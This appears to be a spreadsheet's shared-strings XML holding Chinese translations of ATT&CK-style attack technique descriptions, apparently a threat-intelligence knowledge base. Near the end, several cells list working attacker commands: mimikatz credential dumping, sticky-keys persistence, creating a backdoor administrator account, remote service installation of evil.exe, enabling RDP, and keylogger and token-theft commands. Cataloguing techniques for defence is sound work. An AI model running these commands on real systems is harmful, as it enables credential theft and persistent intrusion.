    <t>攻击者可能会滥用Windows Management Instrumentation（WMI）来执行恶意命令和有效负载。WMI是一种管理功能，为访问Windows系统组件提供统一的环境。WMI服务支持本地和远程访问，尽管后者由远程服务（如分布式组件对象模型（DCOM）和Windows远程管理（WinRM））提供便利。DCOM上的远程WMI使用端口135进行操作，而WinRM上的WMI在使用HTTP和5986进行HTTPS时通过端口5985进行操作。</t>
  </si>
  <si>
    <t>攻击者可能会绕过应用程序控制，通过在XSL文件中嵌入脚本来模糊代码的执行。可扩展样式表语言（XSL）文件通常用于描述XML文件中数据的处理和呈现。为了支持复杂的操作，XSL标准包括对各种语言的嵌入式脚本的支持。</t>
  </si>
  <si>
    <t>攻击者可以从恶意应用程序调用标准操作系统API来收集日历条目数据，或者使用升级权限直接访问包含日历数据的文件。</t>
  </si>
  <si>
    <t>在安卓系统上，攻击者可以从恶意应用程序调用标准操作系统API来收集呼叫日志数据，或者使用升级权限直接访问包含呼叫日志数据的文件。</t>
  </si>
  <si>
    <t>攻击者可以从恶意应用程序调用标准操作系统API来收集联系人列表（即通讯簿）数据，或者使用升级权限直接访问包含联系人列表数据的文件。</t>
  </si>
  <si>
    <t>在4.1之前的Android版本上，攻击者可能会使用持有READ_LOGS权限的恶意应用程序来获取私钥、密码、其他凭据或设备系统日志中存储的其他敏感数据。在Android 4.1及更高版本上，攻击者需要尝试执行操作系统权限提升攻击才能访问日志。</t>
  </si>
  <si>
    <t>攻击者可以访问和收集驻留在设备上的应用程序数据。攻击者通常瞄准Facebook、微信和Gmail等热门应用。</t>
  </si>
  <si>
    <t>攻击者可以使用蜂窝网络而不是企业Wi-Fi进行通信，以绕过企业网络监控系统。攻击者还可以使用其他非互联网协议媒介（如SMS、NFC或蓝牙）进行通信，以绕过网络监控系统。</t>
  </si>
  <si>
    <t>攻击者可能会试图识别设备上安装的所有应用程序。这样做的一个用例是识别端点安全应用程序的存在，这些应用程序可能会增加攻击者的检测风险。另一个用例是识别攻击者可能希望瞄准的应用程序的存在。</t>
  </si>
  <si>
    <t>通过升级权限，攻击者可以对移动设备进行编程，模拟USB设备，如输入设备（键盘和鼠标）、存储设备和/或网络设备，以攻击物理连接的PC。这项技术已在Android上演示过。我们不知道iOS上有任何演示。</t>
  </si>
  <si>
    <t>攻击者可以使用标准操作系统API捕获音频以收集移动设备用户的信息。攻击者可能会以用户对话、环境、电话或其他敏感信息等音频信息为目标。</t>
  </si>
  <si>
    <t>攻击者可以利用摄像头捕捉有关用户、其周围环境或其他物理标识符的信息。攻击者可以使用移动设备上的物理摄像头设备来捕获图像或视频。默认情况下，在Android和iOS中，应用程序必须请求用户通过请求提示符授予的访问摄像头设备的权限。在安卓系统中，应用程序必须持有安卓系统。准许摄像头访问摄像头的权限。在iOS中，应用程序必须在信息中包含NSCamerauseDescription密钥。plist文件，并且必须在运行时请求访问相机。</t>
  </si>
  <si>
    <t>攻击者可能滥用剪贴板管理器API获取复制到全局剪贴板的敏感信息。例如，从password manager应用程序复制和粘贴的密码可能会被安装在设备上的另一个应用程序捕获。</t>
  </si>
  <si>
    <t>攻击者可能会滥用剪贴板功能来拦截和替换Android设备剪贴板中的信息。恶意应用程序可能会通过ClipboardManager监视剪贴板活动。Android上的OnPrimaryClipChangedListener接口，以确定剪贴板内容何时发生更改。监听剪贴板活动、读取剪贴板内容和修改剪贴板内容不需要明确的应用程序权限，可以由后台运行的应用程序执行，但是，随着Android 10的发布，这种行为已经发生了变化。</t>
  </si>
  <si>
    <t>攻击者可能会使用代码注入攻击将任意代码植入正在运行的应用程序的地址空间。然后由该应用程序执行或解释代码。利用这种技术的攻击者可以利用动态库在运行时加载代码的能力。</t>
  </si>
  <si>
    <t>攻击者可以使用内置的命令行界面与设备交互并执行命令。Android提供了一个bash shell，可以通过Android调试桥（ADB）进行交互，也可以使用Java的运行时包进行编程。在iOS上，如果设备被越狱，攻击者可以与底层运行时外壳交互。</t>
  </si>
  <si>
    <t>攻击者可以通过常用端口进行通信，绕过防火墙或网络检测系统，并与正常网络活动混合，以避免更详细的检查。</t>
  </si>
  <si>
    <t>攻击者可能会修改安装在设备上的应用程序，以建立对受害者的持久访问。这些恶意修改可用于使合法应用程序在使用时执行敌对任务。</t>
  </si>
  <si>
    <t>攻击者可以加密存储在移动设备上的文件，以防止用户访问它们，例如，目的是仅在支付赎金后解锁对文件的访问。如果没有升级权限，攻击者通常仅限于加密外部/共享存储位置中的文件。这项技术已经在安卓系统上进行了演示。我们不知道在iOS上有任何演示使用。</t>
  </si>
  <si>
    <t>攻击者可能会擦除设备或删除单个文件，以操纵外部结果或隐藏活动。应用程序必须具有管理员权限才能完全擦除设备，而单个文件可能不需要特殊权限才能删除，具体取决于其存储位置。</t>
  </si>
  <si>
    <t>恶意应用是一种常用的攻击向量，它被攻击者用来获取移动设备上的存在。移动设备通常被配置为只允许从授权的应用商店（如谷歌Play商店或苹果应用商店）安装应用程序。攻击者可能会试图将恶意应用程序放置在授权的应用商店中，从而使应用程序能够安装到目标设备上。</t>
  </si>
  <si>
    <t>恶意应用是一种常用的攻击向量，它被攻击者用来获取移动设备上的存在。这种技术描述了在目标移动设备上安装恶意应用程序，而不涉及授权应用商店（例如谷歌Play商店或苹果应用商店）。由于潜在的检测风险增加或其他原因，攻击者可能希望避免在授权应用商店中放置恶意应用程序。然而，移动设备通常被配置为只允许从授权的应用商店安装应用程序，这将阻止该技术工作。</t>
  </si>
  <si>
    <t>攻击者可能会请求设备管理员权限来执行恶意操作。</t>
  </si>
  <si>
    <t>攻击者可能会试图将合法用户锁定在设备之外，例如禁止用户交互或获取赎金。</t>
  </si>
  <si>
    <t>攻击者可以利用安全软件使用的技术知识来逃避检测。例如，一些移动安全产品通过搜索特定工件（如已安装的“su”二进制文件）来执行受损设备检测，但可以通过将二进制文件命名为其他名称来避免该检查。类似地，多态代码技术也可以用来逃避基于特征码的检测。</t>
  </si>
  <si>
    <t>攻击者可以使用域生成算法（DGA）按程序生成用于命令和控制通信以及其他用途（如恶意应用程序分发）的域名。</t>
  </si>
  <si>
    <t>攻击者可能会导致移动设备使用不太安全的协议，例如，通过干扰LTE等较新协议使用的频率，并且只允许GSM等较旧协议进行通信。使用不太安全的协议可能会使通信更容易被窃听或操纵。</t>
  </si>
  <si>
    <t>如“按需驾驶折衷”所述，按需驾驶折衷是指攻击者在正常浏览过程中通过访问网站的用户访问系统。有了这种技术，用户的web浏览器就成为攻击的目标。例如，网站可能包含恶意媒体内容，旨在利用媒体解析器中的漏洞进行攻击，如Android Stagefright漏洞所示。</t>
  </si>
  <si>
    <t>如果移动设备和远程服务器之间的网络流量未加密或以不安全的方式加密，则位于网络上的攻击者可以窃听通信。</t>
  </si>
  <si>
    <t>恶意应用程序可能会在完全执行有效负载之前尝试检测其操作环境。这些检查通常用于确保应用程序未在分析环境中运行，例如用于应用程序审查、安全研究或逆向工程的沙箱。攻击者可能会对指纹模拟器和沙箱环境使用许多不同的检查，例如物理传感器、位置和系统属性。攻击者可以访问android。操作系统。SystemProperties通过Java反射获取特定的系统信息。标准值，如电话号码、IMEI、IMSI、设备ID和设备驱动程序，可以对照常见沙盒的默认签名进行检查。</t>
  </si>
  <si>
    <t>攻击者可能试图通过网络利用企业服务器、工作站或其他资源。这种技术可以利用移动设备通过本地连接或通过虚拟专用网络（VPN）访问内部企业网络。</t>
  </si>
  <si>
    <t>攻击者可以利用信号系统漏洞将呼叫或短信（SMS）重定向到攻击者控制下的电话号码。然后，攻击者可以充当中间的攻击者，拦截或操纵通信。截获短信可以让攻击者获得用于多因素身份验证的身份验证码。</t>
  </si>
  <si>
    <t>攻击者可以利用信号系统漏洞追踪移动设备的位置。</t>
  </si>
  <si>
    <t>恶意应用程序或其他攻击向量可用于利用可信执行环境（TEE）中运行的代码中的漏洞。然后，攻击者可以获得TEE拥有的特权，可能包括访问加密密钥或其他敏感数据的能力。为了能够攻击TEE，可能首先需要升级的操作系统权限。否则，TEE中的权限可能会被用来攻击操作系统。</t>
  </si>
  <si>
    <t>攻击者可能会滥用Android的startForeground（）API方法来保持连续的传感器访问。从Android 9开始，在后台运行的空闲应用程序不再能够访问设备传感器，如摄像头、麦克风和陀螺仪。应用程序可以通过使用Android的startForeground（）API方法在前台运行来保持对传感器的访问。这会通知系统用户正在与应用程序进行主动交互，不应终止该应用程序。启动前台服务的唯一要求是向用户显示持久通知。</t>
  </si>
  <si>
    <t>攻击者可能会试图从移动设备中获得虚假广告收入，例如，在没有用户参与的情况下触发广告链接的自动点击。</t>
  </si>
  <si>
    <t>攻击者可能会利用设备的地理位置来限制某些恶意行为。例如，恶意软件运营商可能会将第二阶段有效载荷的分配限制在某些地理区域。</t>
  </si>
  <si>
    <t>攻击者可能会利用挂钩来隐藏与他们的行为相关的伪影，以逃避检测。挂钩可用于修改系统API和函数调用的返回值或数据结构。这个过程通常涉及使用第三方根框架，比如Xposed或Magisk，利用系统漏洞或预先存在的根访问。通过为根框架包含自定义模块，攻击者可以钩住系统API，改变返回值和/或系统数据结构，以改变系统各个方面的功能性/可见性。</t>
  </si>
  <si>
    <t>攻击者可以捕获用户输入，通过各种方法从用户处获取凭据或其他信息。</t>
  </si>
  <si>
    <t>操作系统和已安装的应用程序通常有合理的需求来提示用户输入敏感信息，例如帐户凭据、银行帐户信息或个人识别信息（PII）。攻击者可能会模仿此功能来提示用户提供敏感信息。</t>
  </si>
  <si>
    <t>攻击者可能会试图在移动设备上安装不安全或恶意的配置设置，通过钓鱼电子邮件或文本消息等方式直接将配置设置作为附件，或包含指向配置设置的web链接。设备用户可能会被欺骗，通过社会工程技术安装配置设置。</t>
  </si>
  <si>
    <t>攻击者可以从iOS设备收集钥匙链存储数据以获取凭据。密钥链是iOS的内置方式，用于跟踪用户的密码和许多服务和功能的凭据，如Wi-Fi密码、网站、安全笔记、证书、私钥和VPN凭据。</t>
  </si>
  <si>
    <t>攻击者可以使用恶意或被利用的应用程序，通过使用标准操作系统API来秘密跟踪设备的物理位置。</t>
  </si>
  <si>
    <t>物理访问移动设备的攻击者可能会试图绕过设备的锁屏。</t>
  </si>
  <si>
    <t>攻击者可以通过访问受损设备的凭据，触发应用程序下载或发布虚假的应用程序评论，试图操纵应用程序商店排名或评级。这种技术可能需要特权访问（根设备或越狱设备）。</t>
  </si>
  <si>
    <t>如果移动设备和远程服务器之间的网络通信未得到安全保护，则位于网络上的攻击者可能能够在不被检测的情况下操纵网络通信。例如，FireEye研究人员在2014年发现，Google Play Store中排名前1000的免费应用程序中，68%至少存在一个传输层安全（TLS）实现漏洞，可能会使应用程序的网络流量受到中间攻击者的攻击。</t>
  </si>
  <si>
    <t>攻击者可以通过将已开发的恶意软件伪装成合法应用程序来传播该恶意软件。这可以通过两种不同的方式实现：将恶意软件嵌入合法的应用程序，或者假装是合法的应用程序。</t>
  </si>
  <si>
    <t>ART（安卓运行时）在设备本身上编译优化代码以提高性能。攻击者可以使用升级的权限修改缓存的代码，以隐藏恶意行为。由于代码是在设备上编译的，因此它可能不会收到与系统分区中运行的代码相同级别的完整性检查。</t>
  </si>
  <si>
    <t>如果攻击者可以升级权限，他或她可能会使用这些权限在设备内核或其他引导分区组件中放置恶意代码，这些代码可能会逃避检测，在设备重置后可能会持续存在，并且设备用户可能无法移除。在某些情况下（例如，检测下描述的三星Knox保修位），可能会检测到攻击，但可能会导致设备处于不再允许某些功能的状态。</t>
  </si>
  <si>
    <t>如果攻击者可以升级权限，他或她可能会使用这些权限在设备系统分区中放置恶意代码，在设备重置后，恶意代码可能会持续存在，并且设备用户可能无法轻松删除。</t>
  </si>
  <si>
    <t>如果攻击者可以升级权限，他或她可能能够使用这些权限将恶意代码放置在设备的受信任执行环境（TEE）或其他类似的隔离执行环境中，在这些环境中，代码可以逃避检测，在设备重置后可能会持续存在，并且设备用户可能无法移除。在TEE中运行代码可能会让攻击者能够监视或篡改整个设备行为。</t>
  </si>
  <si>
    <t>攻击者可能会使用Android的本机开发工具包（NDK）编写本机函数，以实现二进制文件或函数的执行。与传统桌面操作系统上的系统调用一样，本机代码的执行级别低于正常的Android SDK调用。</t>
  </si>
  <si>
    <t>攻击者可能会使用设备传感器收集有关附近网络的信息，如Wi-Fi和蓝牙。</t>
  </si>
  <si>
    <t>攻击者可能会试图获取远程主机上运行的服务列表，包括那些可能容易受到远程软件攻击的服务。获取这些信息的方法包括从移动设备进行端口扫描和漏洞扫描。这种技术可以利用移动设备通过本地连接或通过虚拟专用网络（VPN）访问内部企业网络。</t>
  </si>
  <si>
    <t>攻击者可以捕获进出该设备的网络流量以获取凭据或其他敏感数据，或者重定向网络流量以通过攻击者控制的网关进行同样的操作。</t>
  </si>
  <si>
    <t>能够对云备份服务（如谷歌的Android备份服务或苹果的iCloud）进行未经授权访问或滥用授权访问的攻击者可以使用该访问获取存储在设备备份中的敏感数据。例如，Elcomsoft Phone Breaker产品宣传了从苹果iCloud检索iOS备份数据的能力。Elcomsoft还描述了从iCloud中存储的备份中获取WhatsApp通信历史记录。</t>
  </si>
  <si>
    <t>攻击者可能会使用受损设备作为Internet的代理服务器。通过使用代理，攻击者可以从网络流量的目的地隐藏其C2服务器和相关基础设施的真实IP地址。这将攻击者的流量伪装成来自受损设备的合法流量，该设备可以规避基于IP的限制，并对某些服务（如银行账户和社交媒体网站）发出警报。</t>
  </si>
  <si>
    <t>能够未经授权访问或滥用云服务（如谷歌的Android设备管理器或苹果iCloud的Find my iPhone）或企业移动管理（EMM）/移动设备管理（MDM）服务器控制台的授权访问权限的攻击者可以使用该访问来跟踪移动设备。</t>
  </si>
  <si>
    <t>能够获得对云服务（如谷歌的Android设备管理器或苹果iCloud的Find my iPhone）或EMM控制台的未经授权访问或滥用授权访问权限的攻击者可以使用该访问权限删除注册设备。</t>
  </si>
  <si>
    <t>攻击者可以建立一个恶意蜂窝基站，然后利用它窃听或操纵蜂窝设备通信。一个受损的蜂窝基站可以用来实现这项技术。</t>
  </si>
  <si>
    <t>攻击者可以设置未经授权的Wi-Fi接入点或破坏现有接入点，如果设备连接到这些接入点，则可以实施基于网络的攻击，例如窃听或修改网络通信。</t>
  </si>
  <si>
    <t>攻击者可能会滥用任务调度功能来促进恶意代码的初始或重复执行。在Android和iOS上，API和库的存在有助于安排任务在指定的日期、时间或间隔执行。</t>
  </si>
  <si>
    <t>攻击者可能会使用屏幕截图来收集有关前台运行的应用程序的信息，捕获用户数据、凭据或其他敏感信息。在后台运行的应用程序可以使用Android MediaProjectionManager（通常需要设备用户同意）捕获在前台运行的另一个应用程序的屏幕截图或视频。后台应用程序也可以使用Android辅助功能服务来捕获前台应用程序显示的屏幕内容。具有root访问权限或安卓调试桥（adb）访问权限的攻击者可以调用安卓screencap或screenrecord命令。</t>
  </si>
  <si>
    <t>攻击者可以说服移动网络运营商（例如，通过社交网络、伪造身份证或受信任员工实施的内部攻击）发行新的SIM卡，并将其与现有电话号码和帐户关联。然后，攻击者可以获取短信或劫持他人的电话。</t>
  </si>
  <si>
    <t>攻击者可以在未经用户授权的情况下删除、更改或发送短信。这可以用来隐藏C2短信、传播恶意软件或各种外部影响。</t>
  </si>
  <si>
    <t>攻击者可以使用通用的、标准化的应用层协议（如HTTP、HTTPS、SMTP或DNS）进行通信，通过与现有流量混合来避免检测。</t>
  </si>
  <si>
    <t>攻击者可以明确使用已知的加密算法来隐藏命令和控制流量，而不是依赖通信协议提供的任何固有保护。尽管使用了安全算法，但如果在恶意软件样本/配置文件中编码和/或生成必要的密钥，这些实现可能容易受到反向工程的攻击。</t>
  </si>
  <si>
    <t>正如供应链妥协中进一步描述的那样，供应链妥协是在最终消费者收到产品或产品交付机制之前，为了数据或系统妥协的目的而对产品或产品交付机制进行的操纵。在某种程度上，攻击者也可以识别并利用无意中存在的漏洞。在许多情况下，可能很难确定可利用的功能是出于恶意意图还是仅仅是无意中的错误。</t>
  </si>
  <si>
    <t>攻击者可能试图获取有关操作系统和硬件的详细信息，包括版本、补丁和体系结构。</t>
  </si>
  <si>
    <t>攻击者可能会使用非标准端口过滤信息。</t>
  </si>
  <si>
    <t>攻击者可以注册统一资源标识符（URI）来拦截敏感数据。</t>
  </si>
  <si>
    <t>攻击者可能会试图通过向用户隐藏恶意行为来避免被发现。通过这样做，攻击者的修改很可能会在设备上安装更长时间，从而允许攻击者继续在该设备上操作。</t>
  </si>
  <si>
    <t>攻击者可以使用现有的合法外部Web服务作为将命令转发到受损系统的手段。</t>
  </si>
  <si>
    <t>攻击者可以购买、租赁或租用一个受损系统网络，这些系统可以在瞄准过程中使用。僵尸网络是一个由受损系统组成的网络，可以被指示执行协调的任务。攻击者可以从引导者/施压者服务购买订阅以使用现有僵尸网络。利用僵尸网络，攻击者可能会执行后续活动，如大规模网络钓鱼或分布式拒绝服务（DDoS）。</t>
  </si>
  <si>
    <t>攻击者可能会执行主动侦察扫描，以收集在瞄准过程中可以使用的信息。主动扫描是指攻击者通过网络流量探测受害者基础设施的扫描，而不是不涉及直接交互的其他形式的侦察。</t>
  </si>
  <si>
    <t>攻击者可能会扫描受害者的IP块，以收集在瞄准过程中可以使用的信息。公共IP地址可以按块或一系列顺序地址分配给组织。</t>
  </si>
  <si>
    <t>攻击者可能会破坏对目标锁定期间可使用的第三方web服务的访问。存在各种流行网站，合法用户可以注册基于web的服务，如GitHub、Twitter、Dropbox、Google等。攻击者可能会试图获得合法用户访问web服务的所有权，并将该web服务用作支持网络运营的基础设施。这种web服务可能在攻击者生命周期的后期阶段被滥用，例如在命令和控制（web服务）或通过web服务进行过滤期间。使用谷歌（Google）或推特（Twitter）等公共服务，让攻击者更容易隐藏在预期的噪音中。通过利用web服务，尤其是当合法用户的访问被窃取时，攻击者可能会使物理上将操作绑定到他们身上变得困难。</t>
  </si>
  <si>
    <t>攻击者可以建立在瞄准过程中可以使用的能力。与其购买、免费下载或窃取能力，攻击者可以在内部开发自己的能力。这是识别开发需求和构建解决方案（如恶意软件、漏洞利用和自签名证书）的过程。攻击者可能会在攻击者生命周期的多个阶段开发支持其作战的能力。</t>
  </si>
  <si>
    <t>攻击者可以动态建立与指挥和控制基础设施的连接，以逃避常见的检测和补救措施。这可以通过使用与攻击者用于接收恶意软件通信的基础设施共享通用算法的恶意软件来实现。这些计算可用于动态调整参数，如恶意软件用于命令和控制的域名、IP地址或端口号。</t>
  </si>
  <si>
    <t>攻击者可使用执行护栏，根据攻击者提供的和预期目标上存在的特定环境条件，限制执行或行动。护栏确保有效载荷仅针对预定目标执行，并减少攻击者战役的附带伤害。攻击者可以提供的有关目标系统或环境的价值观可以用作防护措施，包括特定的网络共享名称、连接的物理设备、文件、加入的Active Directory（AD）域以及本地/外部IP地址。</t>
  </si>
  <si>
    <t>攻击者可以通过对称加密的网络协议（而非现有的指挥和控制通道）过滤数据，从而窃取数据。数据也可以从主命令和控制服务器发送到备用网络位置。</t>
  </si>
  <si>
    <t>攻击者可以通过非对称加密的网络协议（而不是现有的指挥和控制通道）过滤数据，从而窃取数据。数据也可以从主命令和控制服务器发送到备用网络位置。</t>
  </si>
  <si>
    <t>攻击者可以通过未加密的网络协议（而非现有命令和控制通道的协议）过滤数据，从而窃取数据。数据也可以从主命令和控制服务器发送到备用网络位置。</t>
  </si>
  <si>
    <t>如果主通道受损或无法访问，攻击者可使用备用或备用通信通道，以维持可靠的指挥和控制，并避免数据传输阈值。</t>
  </si>
  <si>
    <t>攻击者可能会收集有关受害者主机软件的信息，这些信息可以在瞄准过程中使用。有关已安装软件的信息可能包括各种详细信息，例如特定主机上的类型和版本，以及是否存在其他组件，这些组件可能表明添加了防御保护（例如：防病毒、SIEMs等）。</t>
  </si>
  <si>
    <t>攻击者可能会收集有关受害者网络拓扑的信息，以便在瞄准过程中使用。关于网络拓扑的信息可能包括各种细节，包括外部网络环境和内部网络环境的物理和/或逻辑安排。该信息还可能包括有关网络设备（网关、路由器等）和其他基础设施的详细信息。</t>
  </si>
  <si>
    <t>攻击者可能会收集有关受害者的网络安全设备的信息，这些信息可以在锁定目标时使用。有关网络安全设备的信息可能包括各种详细信息，例如部署的防火墙、内容过滤器和代理/堡垒主机的存在和细节。攻击者还可能以受害者基于网络的入侵检测系统（NIDS）或其他与防御网络安全操作有关的设备的信息为目标。</t>
  </si>
  <si>
    <t>攻击者可能试图阻止传感器通常捕获的指示器或事件被收集和分析。这可能包括恶意重定向甚至禁用基于主机的传感器，例如Windows事件跟踪（ETW），方法是篡改控制事件遥测收集和流的设置。这些设置可以存储在系统的配置文件和/或注册表中，也可以通过PowerShell或Windows Management Instrumentation等管理实用程序进行访问。</t>
  </si>
  <si>
    <t>攻击者可能会在受损环境中的系统之间传输工具或其他文件。文件可以从一个系统复制到另一个系统，以便在操作过程中放置攻击者工具或其他文件。攻击者可以使用固有的文件共享协议在内部受攻击系统之间横向复制文件，以支持横向移动，例如通过SMB将文件共享到连接的网络共享，或通过SMB/Windows管理共享或远程桌面协议的认证连接。文件也可以通过scp、rsync和sftp等本机工具在Mac和Linux上复制。</t>
  </si>
  <si>
    <t>攻击者可能试图通过向目标反映大量网络流量来造成拒绝服务。这种类型的网络DoS利用第三方服务器中介，该中介承载并响应给定的伪造源IP地址。这种第三方服务器通常被称为反射器。攻击者通过向反射器发送包含受害者伪造地址的数据包来完成反射攻击。与直接网络洪水类似，可以使用多个系统进行攻击，或者使用僵尸网络。类似地，一个或多个反射器可用于将通信量聚焦在目标上。</t>
  </si>
  <si>
    <t>攻击者可能会寻找远程系统上共享的文件夹和驱动器，作为识别信息源的一种手段，以收集信息作为收集的前兆，并识别横向移动的潜在感兴趣系统。网络通常包含共享的网络驱动器和文件夹，使用户可以通过网络访问不同系统上的文件目录。</t>
  </si>
  <si>
    <t>攻击者可以在单独的协议中通过隧道与受害者系统进行网络通信，以避免检测/网络过滤和/或允许访问其他无法访问的系统。隧道涉及显式地将一个协议封装到另一个协议中。这种行为可能通过与现有流量混合和/或提供外层加密（类似于VPN）来隐藏恶意流量。隧道还可以实现网络数据包的路由，否则这些数据包将无法到达其预期目的地，例如SMB、RDP或其他将由网络设备过滤或不通过互联网路由的流量。</t>
  </si>
  <si>
    <t>攻击者可能会从威胁情报供应商处搜索私人数据，以获取可在瞄准过程中使用的信息。威胁情报供应商可能会提供付费订阅源或门户，提供比公开报告更多的数据。尽管敏感细节（如客户姓名和其他标识符）可能会被编辑，但这些信息可能包含与违规行为有关的趋势，如目标行业、归属声明和成功的TTP/对策。</t>
  </si>
  <si>
    <t>攻击者可以搜索免费的技术数据库，以获取目标锁定期间可以使用的受害者信息。关于受害者的信息可以在在线数据库和存储库中获得，例如域/证书的注册，以及从流量和/或扫描中收集的网络数据/工件的公共集合。</t>
  </si>
  <si>
    <t>攻击者可以在公共扫描数据库中搜索可以在瞄准过程中使用的受害者信息。各种在线服务不断发布互联网扫描/调查的结果，通常收集活动IP地址、主机名、开放端口、证书甚至服务器横幅等信息。</t>
  </si>
  <si>
    <t>攻击者可以将工具上传到第三方或攻击者控制的基础设施，以使其在瞄准过程中可访问。工具可以是开源的，也可以是开源的，免费的，也可以是商用的。攻击者可以将工具用于恶意目的，但（与恶意软件不同）并非有意用于这些目的（例如：PsExec）。攻击者可能会上传工具以支持其操作，例如将工具提供给受害者网络，以便通过将其放置在可访问Internet的web服务器上来实现入口工具传输。</t>
  </si>
  <si>
    <t>攻击者可以使用端口敲门来隐藏用于持久性或命令和控制的开放端口。为了启用一个端口，攻击者会向预定义的关闭端口序列发送一系列尝试的连接。序列完成后，打开端口通常由基于主机的防火墙完成，但也可以由自定义软件实现。</t>
  </si>
  <si>
    <t>攻击者可以在未经用户授权的情况下拨打、转发或阻止电话。这可用于攻击者目标，如音频监控、拦截或转发设备所有者的呼叫，或C2通信。</t>
  </si>
  <si>
    <t>文件可以从一个系统复制到另一个系统，以便在操作过程中放置攻击者工具或其他文件。可以通过命令和控制通道从外部攻击者控制的系统复制文件，将工具带入受害者网络或受害者设备。</t>
  </si>
  <si>
    <t>技术种类</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网络攻击</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网络威胁行为体</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>数据源</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>组织</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>logonpasswords[space]mimikatz !sekurlsa::logonpasswords[space]mimikatz!sekurlsa::msv[space]mimikatz !sekurlsa::kerberos[space]mimikatz !sekurlsa::wdigest[space]</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>hashdump[space]mimikatz !lsadump::sam</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Sticky Keys Persistence via Registry Manipulations:[space]REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>arp -a[space]route print</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Check for common privilege escalation methods:[space]*upload PowerUp.ps1 to victim disk*[space]powershell.exe -epbypass PowerUp.ps1[space]Invoke-AllChecks</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Creating a new service remotely:[space]net use \\COMP\ADMIN$ "password" /user:DOMAIN_NAME\UserName[space]copy evil.exe \\COMP\ADMIN$\System32\acachsrv.exe[space]sc \\COMP create acachsrv binPath= "C:\Windows\System32\acachsrv.exe" start= auto  DisplayName= "DisplayName"[space]sc \\COMP start acachsrv</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Creating a scheduled task:[space]schtasks [/S HOSTNAME] /create /tn "acachesrv" /tr C:\file\path\here.exe /sc ONLOGON /ru "System" [/rp password][space]Requirements for running scheduled tasks:
net start schedule[space]sc config schedule start= auto</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>starting the keylogger:[space]keyscan_start[space]when you're ready to get the logs:[space]keyscan_dump[space]when you're done keylogging:[space]keyscan_stop</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>tasklist /v [/svc][space]net start[space]qprocess *</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Enable RDP Services:[space]REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f[space]reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f [space]net start TermService</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>net use [\\ip\path] [password] [/user:DOMAIN\user][space]net use \\COMP\ADMIN$ password /user:COMP\Administrator (checking password reuse on local admin account)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>To print output simply: python chromepass.py -d[space]To write to csv file: python chromepass.py --o csv[space]To write to json file: python chromepass.py --o json</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>net config workstation[space]net config server</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>dsquery group "ou=Domain Admins,dc=domain,dc=com"[space]dsquery user "dc=domain,dc=com"[space]dsquery * OU="Domain Admins",DC=domain,DC=com -scope base -attr SAMAccountName userPrincipalName Description[space]dsquery * -filter "(&amp;(objectCategory=contact)(objectCategory=person)(mail=*)(objectClass=user))" -Attr samAccountName mail -Limit 0[space]dsquery * -filter "(&amp;(objectCategory=group)(name=*Admin*))" -Attr name description members</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Token Stealing:[space]steal_token pid#</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Add backdoor user account:[space]shell net user support_388945a0 somepasswordhere /add /y[space]shell net localgroup administrators support_388945a0 /add[space]shell net localgroup "remote desktop users"[space]support_388945a0 /add</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Enable backdoor user account:[space]shell net user support_388945a0 /active:yes[space]shell net localgroup administrators support_388945a0 /add[space]shell net localgroup "remote desktop users" support_388945a0 /add</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Sticky Keys Persistence via binary swapping:[space]takeown.exe C:\Windows\system32\sethc.exe[space]del C:\Windows\system32\sethc.exe[space]copy C:\Windows\system32\cmd.exe[space]C:\Windows\system32\sethc.exe</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>100010</t>
  </si>
  <si>
    <t>100011</t>
  </si>
  <si>
    <t>100012</t>
  </si>
  <si>
    <t>100013</t>
  </si>
  <si>
    <t>100014</t>
  </si>
  <si>
    <t>100015</t>
  </si>
  <si>
    <t>100016</t>
  </si>
  <si>
    <t>100017</t>
  </si>
  <si>
    <t>100018</t>
  </si>
  <si>
    <t>100019</t>
  </si>
  <si>
    <t>100020</t>
  </si>
  <si>
    <t>100021</t>
  </si>
  <si>
    <t>100022</t>
  </si>
  <si>
    <t>100023</t>
  </si>
  <si>
    <t>100024</t>
  </si>
  <si>
    <t>100025</t>
  </si>
  <si>
    <t>100026</t>
  </si>
  <si>
    <t>100027</t>
  </si>
  <si>
